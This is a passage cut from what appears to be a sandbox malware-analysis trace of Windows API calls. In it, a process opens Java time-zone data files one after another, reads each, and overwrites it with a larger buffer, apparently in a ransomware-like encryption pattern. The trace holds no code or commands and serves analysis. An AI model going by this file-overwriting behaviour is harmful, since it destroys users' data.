(lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Aqtobe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\aqtobe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0130.723] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0130.723] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1c5 [0130.723] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0130.723] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.723] ReleaseMutex (hMutex=0x168) returned 1 [0130.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Aqtobe", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0130.723] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Aqtobe", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Aqtobe", lpUsedDefaultChar=0x0) returned 6 [0130.723] ReadFile (in: hFile=0x1d4, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1c5, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x2b1f2bc*=0x1c5, lpOverlapped=0x0) returned 1 [0130.724] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0130.724] WriteFile (in: hFile=0x1d4, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x74d, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x2b1f2d0*=0x74d, lpOverlapped=0x0) returned 1 [0130.725] CloseHandle (hObject=0x1d4) returned 1 [0130.725] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Brunei" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\brunei"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0130.727] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0130.727] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4d [0130.727] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0130.727] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.727] ReleaseMutex (hMutex=0x168) returned 1 [0130.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Brunei", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0130.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Brunei", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Brunei", lpUsedDefaultChar=0x0) returned 6 [0130.727] ReadFile (in: hFile=0x1d4, lpBuffer=0x1f9fd08, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fd08*, lpNumberOfBytesRead=0x2b1f2bc*=0x4d, lpOverlapped=0x0) returned 1 [0130.728] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0130.728] WriteFile (in: hFile=0x1d4, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0130.729] CloseHandle (hObject=0x1d4) returned 1 [0130.729] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Dushanbe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\dushanbe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0130.730] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0130.730] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x105 [0130.730] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0130.730] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.731] ReleaseMutex (hMutex=0x168) returned 1 [0130.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dushanbe", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0130.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dushanbe", cchWideChar=8, lpMultiByteStr=0x1f7366c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dushanbe", lpUsedDefaultChar=0x0) returned 8 [0130.731] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ef30f8, nNumberOfBytesToRead=0x105, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef30f8*, lpNumberOfBytesRead=0x2b1f2bc*=0x105, lpOverlapped=0x0) returned 1 [0130.732] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0130.732] WriteFile (in: hFile=0x1d4, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x68d, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x2b1f2d0*=0x68d, lpOverlapped=0x0) returned 1 [0130.732] CloseHandle (hObject=0x1d4) returned 1 [0130.732] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Jakarta" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\jakarta"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0130.837] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0130.837] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x81 [0130.837] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0130.837] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0130.837] ReleaseMutex (hMutex=0x168) returned 1 [0130.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Jakarta", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0130.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Jakarta", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Jakarta", lpUsedDefaultChar=0x0) returned 7 [0130.837] ReadFile (in: hFile=0x204, lpBuffer=0x1f2f438, nNumberOfBytesToRead=0x81, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f2f438*, lpNumberOfBytesRead=0x2b1f2bc*=0x81, lpOverlapped=0x0) returned 1 [0130.839] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0130.839] WriteFile (in: hFile=0x204, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x609, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x609, lpOverlapped=0x0) returned 1 [0130.839] CloseHandle (hObject=0x204) returned 1 [0130.839] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Khandyga" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\khandyga"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0131.042] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0131.042] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x259 [0131.042] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0131.042] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.042] ReleaseMutex (hMutex=0x168) returned 1 [0131.042] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Khandyga", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0131.043] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Khandyga", cchWideChar=8, lpMultiByteStr=0x1f7356c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Khandyga", lpUsedDefaultChar=0x0) returned 8 [0131.043] ReadFile (in: hFile=0x1d4, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x259, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x2b1f2bc*=0x259, lpOverlapped=0x0) returned 1 [0131.043] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0131.044] WriteFile (in: hFile=0x1d4, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x7e1, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x2b1f2d0*=0x7e1, lpOverlapped=0x0) returned 1 [0131.044] CloseHandle (hObject=0x1d4) returned 1 [0131.044] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Makassar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\makassar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0131.632] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0131.632] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x55 [0131.643] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0131.643] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.648] ReleaseMutex (hMutex=0x168) returned 1 [0131.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Makassar", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0131.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Makassar", cchWideChar=8, lpMultiByteStr=0x1f7328c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Makassar", lpUsedDefaultChar=0x0) returned 8 [0131.648] ReadFile (in: hFile=0x20c, lpBuffer=0x1fbab68, nNumberOfBytesToRead=0x55, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbab68*, lpNumberOfBytesRead=0x2b1f2bc*=0x55, lpOverlapped=0x0) returned 1 [0131.764] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0131.765] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5dd, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5dd, lpOverlapped=0x0) returned 1 [0131.765] CloseHandle (hObject=0x20c) returned 1 [0131.766] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Phnom_Penh" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\phnom_penh"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0131.864] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0131.864] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x61 [0131.864] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0131.864] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.864] ReleaseMutex (hMutex=0x168) returned 1 [0131.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Phnom_Penh", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0131.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Phnom_Penh", cchWideChar=10, lpMultiByteStr=0x1f7358c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Phnom_Penh", lpUsedDefaultChar=0x0) returned 10 [0131.865] ReadFile (in: hFile=0x20c, lpBuffer=0x1f56778, nNumberOfBytesToRead=0x61, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f56778*, lpNumberOfBytesRead=0x2b1f2bc*=0x61, lpOverlapped=0x0) returned 1 [0131.866] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0131.866] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e9, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5e9, lpOverlapped=0x0) returned 1 [0131.867] CloseHandle (hObject=0x20c) returned 1 [0131.867] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Riyadh88" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\riyadh88"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0131.868] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0131.868] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x127d [0131.868] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0131.868] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.868] ReleaseMutex (hMutex=0x168) returned 1 [0131.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Riyadh88", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0131.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Riyadh88", cchWideChar=8, lpMultiByteStr=0x1f7328c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Riyadh88", lpUsedDefaultChar=0x0) returned 8 [0131.869] ReadFile (in: hFile=0x20c, lpBuffer=0x2668268, nNumberOfBytesToRead=0x127d, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x2b1f2bc*=0x127d, lpOverlapped=0x0) returned 1 [0131.926] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0131.926] WriteFile (in: hFile=0x20c, lpBuffer=0x2866f58*, nNumberOfBytesToWrite=0x1805, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2866f58*, lpNumberOfBytesWritten=0x2b1f2d0*=0x1805, lpOverlapped=0x0) returned 1 [0131.927] CloseHandle (hObject=0x20c) returned 1 [0131.927] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Tashkent" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\tashkent"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0131.957] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0131.957] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x105 [0131.957] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0131.957] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.957] ReleaseMutex (hMutex=0x168) returned 1 [0131.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tashkent", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0131.958] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tashkent", cchWideChar=8, lpMultiByteStr=0x1f7328c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tashkent", lpUsedDefaultChar=0x0) returned 8 [0131.958] ReadFile (in: hFile=0x20c, lpBuffer=0x1ef30f8, nNumberOfBytesToRead=0x105, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef30f8*, lpNumberOfBytesRead=0x2b1f2bc*=0x105, lpOverlapped=0x0) returned 1 [0131.959] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0131.959] WriteFile (in: hFile=0x20c, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x68d, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x2b1f2d0*=0x68d, lpOverlapped=0x0) returned 1 [0131.960] CloseHandle (hObject=0x20c) returned 1 [0131.960] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Vientiane" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\vientiane"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0131.964] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0131.964] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x61 [0131.964] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0131.964] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.964] ReleaseMutex (hMutex=0x168) returned 1 [0131.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Vientiane", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0131.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Vientiane", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Vientiane", lpUsedDefaultChar=0x0) returned 9 [0131.964] ReadFile (in: hFile=0x20c, lpBuffer=0x1f56778, nNumberOfBytesToRead=0x61, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f56778*, lpNumberOfBytesRead=0x2b1f2bc*=0x61, lpOverlapped=0x0) returned 1 [0131.965] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0131.965] WriteFile (in: hFile=0x20c, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5e9, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x2b1f2d0*=0x5e9, lpOverlapped=0x0) returned 1 [0131.966] CloseHandle (hObject=0x20c) returned 1 [0131.966] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Cape_Verde" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\cape_verde"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x20c [0131.975] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0131.975] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x61 [0131.975] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0131.975] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0131.975] ReleaseMutex (hMutex=0x168) returned 1 [0131.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cape_Verde", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0131.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cape_Verde", cchWideChar=10, lpMultiByteStr=0x1f7328c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Cape_Verde", lpUsedDefaultChar=0x0) returned 10 [0131.975] ReadFile (in: hFile=0x20c, lpBuffer=0x1f56778, nNumberOfBytesToRead=0x61, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f56778*, lpNumberOfBytesRead=0x2b1f2bc*=0x61, lpOverlapped=0x0) returned 1 [0131.976] SetFilePointer (in: hFile=0x20c, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, 